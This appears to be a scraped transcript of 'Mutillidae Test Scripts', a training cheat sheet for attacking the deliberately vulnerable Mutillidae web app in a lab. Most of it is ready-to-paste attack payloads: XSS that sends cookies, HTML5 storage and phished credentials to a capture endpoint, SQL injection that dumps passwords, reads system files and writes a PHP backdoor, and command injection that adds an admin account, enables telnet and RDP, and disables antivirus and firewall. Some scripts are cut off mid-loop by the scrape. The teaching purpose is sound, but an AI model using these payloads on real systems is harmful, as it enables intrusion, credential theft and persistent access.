mutillidae test scripts
Post on 03-Jun-2018
232 Views
Preview:
TRANSCRIPT
-
8/12/2019 Mutillidae Test Scripts
1/27
Topics
Installation
XAMPPVMSamurai - Bootable DVDSamurai InstallationCustom Bootable DVD
Mutillidae Uses
1. Teach web developers how to write secure code2. Teach web developers what exploits may be possible3. Teach web developers insecure coding patterns4. Demonstrate to DBAs what exploits may be possible5. Demonstrate to management what exploits may be possible
--------------------Demonstration--------------------
Pen Testing Methodology (CEH version)
ReconScanning (Discover hosts, ports, services, internal network map, Enumerating user names)
Gaining AccessMaintaining AccessCover Tracks
----------------------------------------BEEF Framework----------------------------------------
Put this text into the add-to-my-blog as a blog entry:
Most developers do not understand how dangerous XSS can be
----------------------------------------Grendel Scan----------------------------------------Backtrack 5:
Change directory to /pentest/web/grendel-scan/.Run grendel.sh to pull up GUI.Provide target URL.Provide non-existent output directory.Configure plug-ins.Run scan.
When scan is done, click terminate scan.Report will be generated.
----------------------------------------RatProxy----------------------------------------
To scan generally:Backtrack 5:
Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutil
-
8/12/2019 Mutillidae Test Scripts
2/27
lidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -lextscgj
Generate Report: ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html
To find XSS:Backtrack 5:
Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d 192.168.56.101 -p 8088 -x
Generate Report: ratproxy-report.sh ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html
----------------------------------------SQLMAP----------------------------------------
*** CONFIRMED! ***python sqlmap.py --url="http://192.168.56.101/mutillidae/index.php?page=view-someones-blog.php" --data="author=6C57C4B5-B341-4539-977B-7ACB9D42985A&view-someones-blog-php-submit-button=View+Blog+Entries" --level=1 --beep --dump
----------------------------------------HTML 5 - Injecting XSS into JSON
----------------------------------------
Page: pen-test-tool-lookup.php
Beginner: Pop up an alert box to show injection worked
Unencoded: "}} );alert(1);//Complete Injection: "}} )%3balert(1)%3b//Prefix: "}} )%3bPayload: alert(1)%3bSuffix: //
Copy and Paste: "}} )%3balert(1)%3b//
Intermediate: Steal cookie with redirection
Unencoded:"}} );document.location="http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie;//
Prefix:"}} )%3bPayload:document.location%3d%22http%3a%2f%2flocalhost%2fmutillid
ae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3bSuffix://Complete Injection: "}} )%3bdocument.location%3d%22http%3a%2f%2f
localhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//
Copy and Paste:
"}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b//
Professional: Steal cookies with XHR injection----------------------------------------------------------------
----------------Generic XHR using GET and XMLHttpRequest to steal cookies- prefix and suffix as neccesary
-
8/12/2019 Mutillidae Test Scripts
3/27
- This is optimized for Firefox which has XMLHttpRequest. Some newer IE will as well.
NOTE: During Reconnassaince, study your target to determine whatkind of browser
they have so the scripts can be tailored and testing for those browsers.
--------------------------------------------------------------------------------
This is a "UDP-style GET". We fire and forget but cannot know ifsucceeded or failed. Perfect for using against savvy users.
Copy and Paste:
var lXMLHTTP; try{ var lAction = "http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie; lXMLHTTP = new XMLHttpRequest(); lXMLHTTP.onreadystatechange = function(){}; lXMLHTTP.open("GET", lAction);lXMLHTTP.send(""); }catch(e){}
--------------------------------------URL Encoded Version--------------------------------------Prefix: "}} )%3bPayload: var+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2fl
ocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d
Suffix: //Complete Injection: "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3
d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//
Copy and Paste:
"}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function()%7b%7d%3blXMLHTTP.open(%22GET%22%2c+lAction)%3blXMLHTTP.send(%22%22)%3b%7dcatch(e)%7b%7d//
--------------------------------------------------------------------------------HTML 5 - Local and session storage - setting values--------------------------------------------------------------------------------
Setting Test Values for HTML5 Storage
// You can use these statements to set some test values.
localStorage.setItem("key1","value1");localStorage.setItem("key2","value2");sessionStorage.setItem("key1","value1");sessionStorage.setItem("key2","value2");
--------------------------------------------------------------------------------HTML 5 - Local and session storage - Reading values--------------------------------------------------------------------------------
------------------------------------------------------------------------
-
8/12/2019 Mutillidae Test Scripts
4/27
--------Reading current HTML5 storage from local browser------------------------------------------------------------------------
--------
try{
var m = "";var l = window.localStorage;var s = window.sessionStorage;
for(i=0;i
-
8/12/2019 Mutillidae Test Scripts
5/27
.getItem(lKey) + ";\n";};console.log(m);}catch(e){alert(e.message);}
--------------------------------------------------------------------------------HTML 5 - Local and session storage - Adding values--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Adding values to HTML5 Storage (Possible Session Fixation)------------------------------------------------------------------------
--------
localStorage.setItem("AccountNumber","123456");sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3"
);sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");
Copy and Paste script to add values - TESTED SUCCESSFULLY
try{localStorage.setItem("AccountNumber","123456");sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");sessionStorage.setI
tem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");}catch(e){alert(e.message);}
Copy and Paste script to read values (Alert box version)
try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
-
8/12/2019 Mutillidae Test Scripts
6/27
structSequence","A1B2C3");sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
-
8/12/2019 Mutillidae Test Scripts
7/27
.getItem(lKey) + ";\n";};console.log(m);}catch(e){alert(e.message);}try{localStorage.setItem("MessageOfTheDay","This was set by Firebug console!"); sessionStorage.setItem("CartSession","ABCDEFG");}catch(e){alert(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
-
8/12/2019 Mutillidae Test Scripts
8/27
-
8/12/2019 Mutillidae Test Scripts
9/27
ge.removeItem("CartSession");}catch(e){console.log(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i
-
8/12/2019 Mutillidae Test Scripts
10/27
r s = window.sessionStorage;for(i=0;i
-
8/12/2019 Mutillidae Test Scripts
11/27
try{var m = "";var l = window.localStorage;for(i=0;i
-
8/12/2019 Mutillidae Test Scripts
12/27
m += "localStorage(" + l.key(i) + "):" +l.getItem(l.key(i)) + "; ";
}
var lAction = "http://localhost/mutillidae/capture-data.php?html5storage=" + m;
lXMLHTTP = new XMLHttpRequest(); lXMLHTTP.onreadystatechange = function(){};
lXMLHTTP.open("GET", lAction);lXMLHTTP.send("");
}catch(e){}
Copy and PasteReflected Cross Site Script - TESTED SUCCESSFULLY
try{ var s = sessionStorage; var l = localStorage; var m= ""; var lXMLHTTP; for(i=0;i
-
8/12/2019 Mutillidae Test Scripts
13/27
Recon: Determine current directory
Windows XP: && dirLinux: && pwd
Recon: Chain commands to discover driectory structure
Windows XP: && cd ../../.. && dirLinux: && cd ../../.. && ls -l
Recon: Get a list of offerings provided by the "net.exe" program
Windows XP: && net
Recon: Get a list of services that can be started or stopped
Windows XP: && net startWindows XP: && net stop
Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc.
Windows XP: && ipconfig /allLinux: && ifconfig
Scanning: Discover hosts on network
Windows XP: && ping -n 1 192.168.56.102Linux: && ping -c 1 192.168.56.102
Scanning: Enumerate Current user
Windows XP: && setLinux: && whoami
Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups
Windows XP: && net view [/domain]Windows XP: && net user [/domain]Windows XP: && net localgroup [/domain]
Gaining Access: Add user
Windows XP: && net user /addLinux: useradd
Gaining Access: Delete user
Windows XP: && net user /delete
Maintain Access: Get Windows Service Names
Windows: sc query
Maintain Access: kill AV
net stop
Maintain Access: kill firewall
-
8/12/2019 Mutillidae Test Scripts
14/27
-
8/12/2019 Mutillidae Test Scripts
15/27
Allow firewall access (netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=)
whatever && netsh firewall add portopening protocol=TCP port=23name=telnet mode=enable scope=custom addresses=
----------------------------One combined injection:----------------------------
whatever && sc config tlntsvr start= demand && sc start tlntsvr&& net user root toor /add && net localgroup TelnetClients /add && net localgroup Administrators root /add && net localgroup TelnetClients root /add && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=customaddresses=192.168.56.101
------------------------------------------------------------------------------------------------------------Command Injection: Enable Windows XP SP3 and similar Remote Desktop Terminal Service------------------------------------------------------------------------------------------------------------
Check if service running (sc query termservice)Configure service from "disabled" to "manual"(sc config termservice star
t= demand)Start service (sc start termservice)Enable Terminal Services (reg add "hklm\system\currentcontrolset\control
\terminalserver" /v fdenytsconnections /t reg_dword /d 0 /f)Enable Terminal Services (reg add "hklm\system\currentcontrolset\control
\terminalserver" /v TSEnabled /t reg_dword /d 1 /f)Check if service listening (netstat -na | find "3389")Add user (net user /add)Add user to group (net localgroup "Remote Desktop Users" /add)Configure firewall to allow RDP (netsh firewall set service type=remoted
esktop mode=enable scope=custom addresses=)
-------------------------SQL Injection-------------------------
Recon: Returns a string that indicates the MySQL server version
Page: user-info.phpField: UsernameValue: ' union select null,VERSION() AS username,null,null --
' union select null,null,null,version() --
Recon: Returns a string that indicates the current database name
Page: user-info.phpField: UsernameValue: ' union select null,DATABASE() AS username,null,null --
Recon: Returns a string that indicates the current database username
Page: user-info.phpField: Username
-
8/12/2019 Mutillidae Test Scripts
16/27
Value: ' union select null,USER() AS username,null,null --
Recon: Extract table names from database
Page: user-info.phpField: Username' union select null,table_schema AS username,table_name AS password,null
from INFORMATION_SCHEMA.TABLES--
Recon: Extract table columns from database using a single field
Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', table_schema, table_name, colu
mn_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS--
Recon: Extract views from database (Doesnt work in MySQL 5.1.8)
Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', table_schema, table_name, view
_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS--
Recon: Extract triggers from database
Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', trigger_schema, trigger_name)
AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--
Recon: Extract routines/procs from database
Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', routine_schema, routine_name,
'(', routine_type, ')') AS username,null,null from INFORMATION_SCHEMA.ROUTINES--
Recon: Extract metadata from database
Page: user-info.phpField: UsernameValue: ' union select null,concat_ws('.', table_schema, table_name, colu
mn_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS union select null,concat_ws('.', routine_schema, routine_name, routine_type, routine_body) AS username,null,null from INFORMATION_SCHEMA.ROUTINES union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS union select null,concat_ws('.', trigger_schema, trigger_name)AS username,null,null from INFORMATION_SCHEMA.TRIGGERS--
Recon/Scanning: Get specifications on database software
Page: user-info.phpField: UsernameValue: ' union select null, database(), current_user(), version() --
Gaining Access: Extract passwords from user table
Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --
-
8/12/2019 Mutillidae Test Scripts
17/27
Maintaining Access:
Covering Tracks:
Page: login.php
Gaining Access: Using SQL Injection
' or 1=1 --
Inserting new user using insert injection to bypass any protections. This example inserts a cross site script.
Page: Register.phpField: Username
backdoor','password','alert(\'Mallicious user input\')') --
Note: Kind of pointless but still fun
Using advanced techniques: Select Concat Char
Page: user-info.php
This allows injection to select arbitrary text. This can be useful to bypass filters and WAFs.
' UNION ALL SELECT null,CONCAT(CHAR(112, 97, 115, 115, 119, 111, 114, 100)),null,null --
Using advanced techniques: Select Using IFNULL to search for columns
Page: user-info.php' UNION ALL SELECT null,IFNULL(CAST(username AS CHAR),CHAR(32)),IFNULL(C
AST(password AS CHAR),CHAR(32)),null FROM accounts --
Using advanced techniques: Open files on target operating system
Page: user-info.phpField: usernameValues:
' union select null, LOAD_FILE('../README') AS username, null, null--
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null--
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\inf\\cpu.inf') AS username, null, null--
' union select null, LOAD_FILE('mysql_error.log'), null, null--
' union select null, LOAD_FILE('..\\..\\..\\htdocs\\mutillidae\\index.php'), null, null--
Using advanced techniques: Writing files to operating systemPage: user-info.phpField: usernameValues:
' union select null,null,null,'Please enter system command
-
8/12/2019 Mutillidae Test Scripts
18/27
td>Command' INTODUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' --
Please enter system command
Command
Please enter system commandCommand
Using advanced techniques: Insert Injection
Technique: SQL Insert InjectionPage: add-to-your-blog.phpField: blogValue: BARK','2003-12-31 01:02:03') --
--------------------------------------------------Blind SQL Injection--------------------------------------------------
Recon: Blind SQL Injection/Brute Forcing values
' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --
' union select null, null, null, IF(((SELECT count(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'user') > 0), sleep(5), sleep(0)) --
' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null --
-
8/12/2019 Mutillidae Test Scripts
19/27
' union Select null, sleep(5) --
Page: login.phpTechnique: Blind SQL Injection - TimingField: usernameValue (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1
Page: login.phpTechnique: Blind SQL Injection - True and False ValuesField: usernameTrue Value (Using Proxy): ' or 1=1 --False Value (Using Proxy): ' and 1=0 --Examine responses to see if they are different
------------------------------------------------------------------------------------------Broken Authentication and Session Management - Escalating privileges--------------------------------------------------------------------------------
----------
Gaining Access: Using insecure client-side authentication tokens
Page: Any pageTool: Web Developer Toolbar
Note what cookies the site has by defaultCreate a test accountLogin using test accountCheck what cookies the site has after authenticationLogoutVerify auth cookies are gone or get rid of them
Create a new cookie based on the original auth cookie, but with different value
Gaining Access: Using insecure client-side authentication tokens
Page: Any pageTool: Cookies Manager+ version 1.5.1 (verified with Firefox 4.0.1)
Note what cookies the site has by defaultCreate a test accountLogin using test accountCheck what cookies the site has after authenticationDifferential Analysis: Change the value of the original auth cookieWork backwards until admin account is found
------------------------------------------------------------------------------------------Broken Authentication and Session Management - Bypass Authorization Control------------------------------------------------------------------------------------------
Gaining Access: Using SQL injection
Page: login.php
-
8/12/2019 Mutillidae Test Scripts
20/27
Field: UsernameValue: ' or 1=1 --
Gaining Access: Using SQL injection
Page: login.phpField: UsernameValue: ' --
------------------------------------------------------------Insecure Direct Object Reference - Accessing system files------------------------------------------------------------
Step 1: Recon: Obtain list of files
Possible Technique: Use command injectionPage: dns-lookup.phpValue (Windows): && dir /wValue (Linux): && pwd && ls -l
Possible Techniques: Use robots.txtPossible Techniques: Use directory browsingPossible Techniques: Use directory brute-forcing
Step 2: Gaining Access: Retrive system files
Page: source-viewer.phpTechnique: Use proxy to change value, Use parent directory to bypass jailsTool: Tamper Data, Paros, WebScarab, BurpField: phpfileValue: , ../../../boot.ini, ..\..\..\WINDOW\System32\drivers\etc\hosts, ../../../etc/passwd
-----------------------------Cross Site Scripting-----------------------------
Page: add-to-your-blog.phpField: blog contentsValue: alert("Cookie stolen and sent to mallicious server: " + document.cookie + ". The developer should have encoded all output, validated all input, )
HTTP Header: Browser User Agent StringTool: User Agent SwitcherValue: Sorry, please login again
Username
PasswordDefense: EncodingDefense When certain tokens allowed: Mapping
Page: add-to-your-blog.phpField: blog contentsTool: Burp-SuiteValue:
-
8/12/2019 Mutillidae Test Scripts
21/27
function capture(theForm){
var lXMLHTTP;try{
var lData = "username=" + theForm.username.value+ "&password=" + theForm.password.value;
var lHost = "localhost";var lProtocol = "http";var lAction = lProtocol + "://" + lHost + "/muti
llidae/capture-data.php";var lMethod = "post";try{
lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");
}catch (e){try{
lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");
}catch(e) {try{
lXMLHTTP = new XMLHttpRequest();
}catch (e) {alert(e.message);//THIS
LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.};//end try};//end try
};//end trylXMLHTTP.onreadystatechange = function(){
if(lXMLHTTP.readyState == 4){theForm.parentNode.style.display
="none";}// end if
};
lXMLHTTP.open(lMethod, lAction, true);
lXMLHTTP.setRequestHeader("Host", lHost);lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
lXMLHTTP.send(lData);}catch(e){
alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
};};//end function
Were
sorry. This session has expired.
Please login again.UsernamePassword -
8/12/2019 Mutillidae Test Scripts
22/27
Defense: Encoding
Page: add-to-your-blogField: blog contentsValue:
var lXMLHTTP;try{
var lData = "data=" + encodeURIComponent(document.cookie);var lHost = "localhost";var lProtocol = "http";var lFilePath = "/mutillidae/capture-data.php";var lAction = lProtocol + "://" + lHost + lFilePath;var lMethod = "POST";
try {lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");
}catch (e) {try {
lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"
); }catch (e) {try {
lXMLHTTP = new XMLHttpRequest();}catch (e) {
//alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.
}}
}//end try
lXMLHTTP.onreadystatechange = function(){}lXMLHTTP.open(lMethod, lAction, true);
lXMLHTTP.setRequestHeader("Host", lHost);lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
lXMLHTTP.send(lData);
}catch(e){}
-----------------------------Cross Site Request Forgery-----------------------------
Page: add-to-your-blog, view-someones-blogTool: HTTPFox (to view forged request)
Force someone to add a blog without consent:
-
8/12/2019 Mutillidae Test Scripts
23/27
-
8/12/2019 Mutillidae Test Scripts
24/27
-------------------------Security Misconfiguration-------------------------
Improper Error Handling:
Page: login.phpField: usernameValue: Result: Error gives SQL exception
---------------------------------Insecure Direct Object References---------------------------------
Page: source-viewer.phpField: phpfileValue (Windows XP): c:\boot.ini, C:\WINDOWS\system32\drivers\etc\hostsTool: netcat, tamper data, paros, webscarab, burp
Use netcat or hackbar to send in post data:
phpfile=c:\boot.ini&source-file-viewer-php-submit-button="View File"phpfile=C:\WINDOWS\system32\drivers\etc\hosts&source-file-viewer-php-sub
mit-button="View File"
Alternative: Use proxy to change value of phpfile to system file
---------------------------------Insecure Cryptographic Storage---------------------------------
Extract passwords from system:
Page: user-info.phpTechnique: Direct SQL injectionField: username
Value: ' or 1=1 --
Page: user-info.phpTechnique: Indirect SQL injectionField: usernameValue: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --
Page: login.phpTechnique: Blind SQL InjectionField: usernameValue (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1
---------------------------------Failure to Restrict URL Access---------------------------------
-
8/12/2019 Mutillidae Test Scripts
25/27
Page: robots.txtTechnique: Security Misconfiguration, Design Flaw
Recon: List FilesTechnique: Shoulder surfing
Recon: List FilesTechnique: Steal Bookmarks
Recon: List FilesTechnique: Dump client cache
Recon: List FilesPage: dns-lookup.phpTechnique: Command InjectionField: hostname
Scanning: View Source CodePage: dns-lookup.phpTechnique: Command InjectionField: hostnameValue: && type config.inc (then see source because PHP code doesnt show in browser)
Gaining Access: View restricted pagePage: Any (i.e. - http://localhost/mutillidae/config.inc, http://localhost/mutillidae/passwords/accounts.txt)Technique: Type in URL
------------------------------------------Insufficient Transport Layer Protection------------------------------------------
Gaining Access: Intercept clear text credentialsPage: login.phpTool: Use any proxy (Paros, Tamper Data) or sniffer (Wireshark, TCPDump, Snort,etc.)
Fields: Username and Password
------------------------------------------Unvalidated redirects and forwards------------------------------------------
Page: credits.phpTechnique: PhishingTool: Any proxy, netcat, hackbarField: forwardurlValue: any URI
Page: credits.php
Technique: Horizontal Application Attack, Restricted URL Access, Authroization BypassTool: Hackbar, anything that can change the URL query parametersField: forwardurlValue: http://localhost/xampp
--------------------------------------------Information Asset Protection - Cache Control--------------------------------------------
-
8/12/2019 Mutillidae Test Scripts
26/27
Recon: Grab leaked company informationPage: index.php, allTechnique: View local cacheTool: Firefox about:cache, Internet Explorer Tools-->Options-->General Tab-->Browser History Settings-->View FilesDefenses: cache control headers
--------------------------------------------Information Asset Protection - Framing--------------------------------------------
Gaining Access: Cross Frame Scripting/Click-jackingPage: index.php, allTecnique: Frame page, use overlayTool (to view defenses): HTTPFoxDefense: x-frame-options, frame busters
----------------------------------------------Information Asset Protection - Leaked Comments----------------------------------------------
Page: index.phpTechnique: View SourceTool: View Source, Sniffer (Wireshark), HTTPFox
Defense: Use framework comment tags to trap comments on the app server
----------------------------------------------Log Injection----------------------------------------------
Page: show-log.phpTechnique: Figure out what fields are logged, which of those the client controls, and inject those fields with SQL injection, HTML injection, XSS, XSRF, etc.Defense: Logs should be output encoded
--------------------------------------------------------------------------------Generic XHR to steal cookies (prefix and suffix as necessary)
--------------------------------------------------------------------------------
var lXMLHTTP;try{
var lData = ;var lHost = "";var lAction = "http://" + lHost + ""
;var lMethod = "";try {
lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");}catch (e) {
try {lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"
);}catch (e) {
try {lXMLHTTP = new XMLHttpRequest();
}catch (e) {alert(e.message);//THIS LINE IS TESTING
AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.}
-
8/12/2019 Mutillidae Test Scripts
27/27
}}//end trylXMLHTTP.onreadystatechange = function(){
if(lXMLHTTP.readyState == 4){alert("Capture Complete");//THIS LINE IS TESTING
AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.}// end if
}
lXMLHTTP.open(lMethod, lAction, true);
///////////////////////////////UNCOMMENT FOR GET REQUESTS///////////////////////////////NOTE: This is a GET so your URL-action has to contain your dat
a. We clear lData only to avoid error.//lData="";/////////////////////////////
///////////////////////////////UNCOMMENT FOR POST REQUESTS///////////////////////////////lXMLHTTP.setRequestHeader("Host", lHost);
//lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");/////////////////////////////
lXMLHTTP.send(lData);
}catch(e){alert(e.message);//THIS LINE IS TESTING AND DEMONSTRATION ONLY.
DO NOT INCLUDE IN PEN TEST.}
top related